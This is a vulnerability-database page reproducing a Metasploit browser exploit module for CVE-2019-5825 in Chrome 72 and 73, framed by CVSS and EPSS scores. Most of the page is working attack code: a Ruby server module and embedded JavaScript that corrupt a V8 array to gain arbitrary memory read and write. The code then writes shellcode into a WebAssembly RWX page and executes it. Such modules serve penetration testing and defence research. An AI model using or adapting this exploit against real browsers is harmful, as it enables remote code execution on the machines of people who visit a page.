Lucene search

K
metasploitDmxcsnsbh, István Kurucsai, timwrMSF:EXPLOIT-MULTI-BROWSER-CHROME_ARRAY_MAP-
HistoryNov 13, 2019 - 2:26 p.m.

Google Chrome 72 and 73 Array.map exploit

2019-11-1314:26:44
dmxcsnsbh, István Kurucsai, timwr
www.rapid7.com
30

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:N/I:N/A:P

0.672 Medium

EPSS

Percentile

97.9%

This module exploits an issue in Chrome 73.0.3683.86 (64 bit). The exploit corrupts the length of a float in order to modify the backing store of a typed array. The typed array can then be used to read and write arbitrary memory. The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload. The payload is executed within the sandboxed renderer process, so the browser must be run with the --no-sandbox option for the payload to work correctly.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpServer::BrowserExploit

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Google Chrome 72 and 73 Array.map exploit',
        'Description' => %q{
          This module exploits an issue in Chrome 73.0.3683.86 (64 bit).
          The exploit corrupts the length of a float in order to modify the backing store
          of a typed array. The typed array can then be used to read and write arbitrary
          memory. The exploit then uses WebAssembly in order to allocate a region of RWX
          memory, which is then replaced with the payload.
          The payload is executed within the sandboxed renderer process, so the browser
          must be run with the --no-sandbox option for the payload to work correctly.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'dmxcsnsbh', # discovery
          'István Kurucsai', # exploit
          'timwr', # metasploit module
        ],
        'References' => [
          ['CVE', '2019-5825'],
          ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=941743'],
          ['URL', 'https://github.com/exodusintel/Chromium-941743'],
          ['URL', 'https://blog.exodusintel.com/2019/09/09/patch-gapping-chrome/'],
          ['URL', 'https://lordofpwn.kr/cve-2019-5825-v8-exploit/'],
        ],
        'Notes' => {
          'Reliability' => [ REPEATABLE_SESSION ],
          'SideEffects' => [ IOC_IN_LOGS ],
          'Stability' => [CRASH_SAFE]
        },
        'Arch' => [ ARCH_X64 ],
        'Platform' => ['windows', 'osx'],
        'DefaultTarget' => 0,
        'Targets' => [ [ 'Automatic', {} ] ],
        'DisclosureDate' => '2019-03-07'
      )
    )
  end

  def on_request_uri(cli, request)
    print_status("Sending #{request.uri} to #{request['User-Agent']}")
    escaped_payload = Rex::Text.to_unescape(payload.encoded)
    jscript = %^
// HELPER FUNCTIONS
let conversion_buffer = new ArrayBuffer(8);
let float_view = new Float64Array(conversion_buffer);
let int_view = new BigUint64Array(conversion_buffer);
BigInt.prototype.hex = function() {
    return '0x' + this.toString(16);
};
BigInt.prototype.i2f = function() {
    int_view[0] = this;
    return float_view[0];
}
BigInt.prototype.smi2f = function() {
    int_view[0] = this << 32n;
    return float_view[0];
}
Number.prototype.f2i = function() {
    float_view[0] = this;
    return int_view[0];
}
Number.prototype.f2smi = function() {
    float_view[0] = this;
    return int_view[0] >> 32n;
}
Number.prototype.i2f = function() {
    return BigInt(this).i2f();
}
Number.prototype.smi2f = function() {
    return BigInt(this).smi2f();
}

// *******************
// Exploit starts here
// *******************
// This call ensures that TurboFan won't inline array constructors.
Array(2**30);

// we are aiming for the following object layout
// [output of Array.map][packed float array][typed array][Object]
// First the length of the packed float array is corrupted via the original vulnerability,
// then the float array can be used to modify the backing store of the typed array, thus achieving AARW.
// The Object at the end is used to implement addrof

// offset of the length field of the float array from the map output
const float_array_len_offset = 23;
// offset of the length field of the typed array
const tarray_elements_len_offset = 24;
// offset of the address pointer of the typed array
const tarray_elements_addr_offset = tarray_elements_len_offset + 1;
const obj_prop_b_offset = 33;

// Set up a fast holey smi array, and generate optimized code.
let a = [1, 2, ,,, 3];
let cnt = 0;
var tarray;
var float_array;
var obj;

function mapping(a) {
  function cb(elem, idx) {
    if (idx == 0) {
      float_array = [0.1, 0.2];

      tarray = new BigUint64Array(2);
      tarray[0] = 0x41414141n;
      tarray[1] = 0x42424242n;
      obj = {'a': 0x31323334, 'b': 1};
      obj['b'] = obj;
    }

    if (idx > float_array_len_offset) {
      // minimize the corruption for stability
      throw "stop";
    }
    return idx;
  }
  return a.map(cb);
}

function get_rw() {
  for (let i = 0; i < 10 ** 5; i++) {
    mapping(a);
  }

  // Now lengthen the array, but ensure that it points to a non-dictionary
  // backing store.
  a.length = (32 * 1024 * 1024)-1;
  a.fill(1, float_array_len_offset, float_array_len_offset+1);
  a.fill(1, float_array_len_offset+2);

  a.push(2);
  a.length += 500;

  // Now, the non-inlined array constructor should produce an array with
  // dictionary elements: causing a crash.
  cnt = 1;
  try {
    mapping(a);
  } catch(e) {
    // relative RW from the float array from this point on
    let sane = sanity_check()
    print('sanity_check == ', sane);
    print('len+3: ' + float_array[tarray_elements_len_offset+3].f2i().toString(16));
    print('len+4: ' + float_array[tarray_elements_len_offset+4].f2i().toString(16));
    print('len+8: ' + float_array[tarray_elements_len_offset+8].f2i().toString(16));

    let original_elements_ptr = float_array[tarray_elements_len_offset+1].f2i() - 1n;
    print('original elements addr: ' + original_elements_ptr.toString(16));
    print('original elements value: ' + read8(original_elements_ptr).toString(16));
    print('addrof(Object): ' + addrof(Object).toString(16));
  }
}

function sanity_check() {
  success = true;
  success &= float_array[tarray_elements_len_offset+3].f2i() == 0x41414141;
  success &= float_array[tarray_elements_len_offset+4].f2i() == 0x42424242;
  success &= float_array[tarray_elements_len_offset+8].f2i() == 0x3132333400000000;
  return success;
}

function read8(addr) {
  let original = float_array[tarray_elements_len_offset+1];
  float_array[tarray_elements_len_offset+1] = (addr - 0x1fn).i2f();
  let result = tarray[0];
  float_array[tarray_elements_len_offset+1] = original;
  return result;
}

function write8(addr, val) {
  let original = float_array[tarray_elements_len_offset+1];
  float_array[tarray_elements_len_offset+1] = (addr - 0x1fn).i2f();
  tarray[0] = val;
  float_array[tarray_elements_len_offset+1] = original;
}

function addrof(o) {
  obj['b'] = o;
  return float_array[obj_prop_b_offset].f2i();
}

var wfunc = null;
var shellcode = unescape("#{escaped_payload}");

function get_wasm_func() {
  var importObject = {
      imports: { imported_func: arg => print(arg) }
  };
  bc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];
  wasm_code = new Uint8Array(bc);
  wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);
  return wasm_mod.exports.exported_func;
}

function rce() {
  let wasm_func = get_wasm_func();
  wfunc = wasm_func;
  // traverse the JSFunction object chain to find the RWX WebAssembly code page
  let wasm_func_addr = addrof(wasm_func) - 1n;
  print('wasm: ' + wasm_func_addr);
  if (wasm_func_addr == 2) {
    print('Failed, retrying...');
    location.reload();
    return;
  }

  let sfi = read8(wasm_func_addr + 12n*2n) - 1n;
  print('sfi: ' + sfi.toString(16));
  let WasmExportedFunctionData = read8(sfi + 4n*2n) - 1n;
  print('WasmExportedFunctionData: ' + WasmExportedFunctionData.toString(16));

  let instance = read8(WasmExportedFunctionData + 8n*2n) - 1n;
  print('instance: ' + instance.toString(16));

  //let rwx_addr = read8(instance + 0x108n);
  let rwx_addr = read8(instance + 0xf8n) + 0n; // Chrome/73.0.3683.86
  //let rwx_addr = read8(instance + 0xe0n) + 18n; // Chrome/69.0.3497.100
  //let rwx_addr = read8(read8(instance - 0xc8n) + 0x53n); // Chrome/68.0.3440.84
  print('rwx: ' + rwx_addr.toString(16));

  // write the shellcode to the RWX page
  if (shellcode.length % 2 != 0) {
    shellcode += "\u9090";
  }

  for (let i = 0; i < shellcode.length; i += 2) {
    write8(rwx_addr + BigInt(i*2), BigInt(shellcode.charCodeAt(i) + shellcode.charCodeAt(i + 1) * 0x10000));
  }

  // invoke the shellcode
  wfunc();
}


function exploit() {
  print("Exploiting...");
  get_rw();
  rce();
}

exploit();
^

    jscript = add_debug_print_js(jscript)
    html = %(
<html>
<head>
<script>
#{jscript}
</script>
</head>
<body>
</body>
</html>
    )
    send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' })
  end

end

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:N/I:N/A:P

0.672 Medium

EPSS

Percentile

97.9%